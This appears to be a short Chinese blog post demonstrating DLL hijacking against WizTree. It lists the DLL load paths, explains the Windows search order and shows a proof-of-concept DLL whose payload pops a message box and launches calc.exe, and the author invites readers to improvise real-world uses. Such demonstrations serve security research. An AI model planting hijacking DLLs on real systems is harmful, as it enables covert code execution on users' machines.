C:\Windows\System32\wow64log.dll
D:\APP\WizTree\mpr.dll
D:\APP\WizTree\oleacc.dll
D:\APP\WizTree\winmm.dll
D:\APP\WizTree\version.dll
D:\APP\WizTree\netapi32.dll
D:\APP\WizTree\winhttp.dll
D:\APP\WizTree\SHFolder.dll
D:\APP\WizTree\NETUTILS.DLL
D:\APP\WizTree\OLEACCRC.DLL
C:\Windows\SysWOW64\rpcss.dll
D:\APP\WizTree\wtsapi32.dll
D:\APP\WizTree\WINSTA.dll
D:\APP\WizTree\olepro32.dll
D:\APP\WizTree\URL.DLL
D:\APP\WizTree\IEFRAME.dll
D:\APP\WizTree\iertutil.dll
D:\APP\WizTree\USERENV.dll
D:\APP\WizTree\WKSCLI.DLL
D:\APP\WizTree\PROPSYS.dll
D:\APP\WizTree\profapi.dll
D:\APP\WizTree\CFGMGR32.dll
D:\APP\WizTree\edputil.dll
D:\APP\WizTree\VAULTCLI.dll
D:\APP\WizTree\urlmon.dll
D:\APP\WizTree\srvcli.dll
D:\APP\WizTree\SspiCli.dll
发现存在可劫持Dll
wtsapi32.dll
程序加载路径
D:\APP\WizTree\wtsapi32.dll
主程序启动会加载路径当前路径下 wtsapi32.dll,但是当前目录下没有此Dll文件,根据Dll路径搜索目录顺序我们可以分析,主程序运行时加载wtsapi32.dll就是加载C:\Windows\System32\wtsapi32.dll 。
DLL路径搜索目录顺序
1. 进程对应的应用程序所在目录
2. 系统目录(即%windir%system32)
3. 16位系统目录(即%windir%system)
制作恶意Dll,生成转发Dll代码(使用大佬工具一键生成)
修改代码实现弹窗和打开计算器
// 弹窗
MessageBox(NULL, L"恭喜你中招了", L" Dll 劫持", MB_OK);
// 执行exe
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcess(TEXT("C:\\Windows\\System32\\calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);
至于实战咋利用大家就各自发挥了,我相信大家骚操作很多,这里我就不献丑了,免得大家笑话。用到的工具Github上有很多,大家可以自行去下载,这里就不放出来了。
文章有点水,但是新鲜,就是今天上午的事。嘿嘿,主要是想提醒大家公众号换头像了!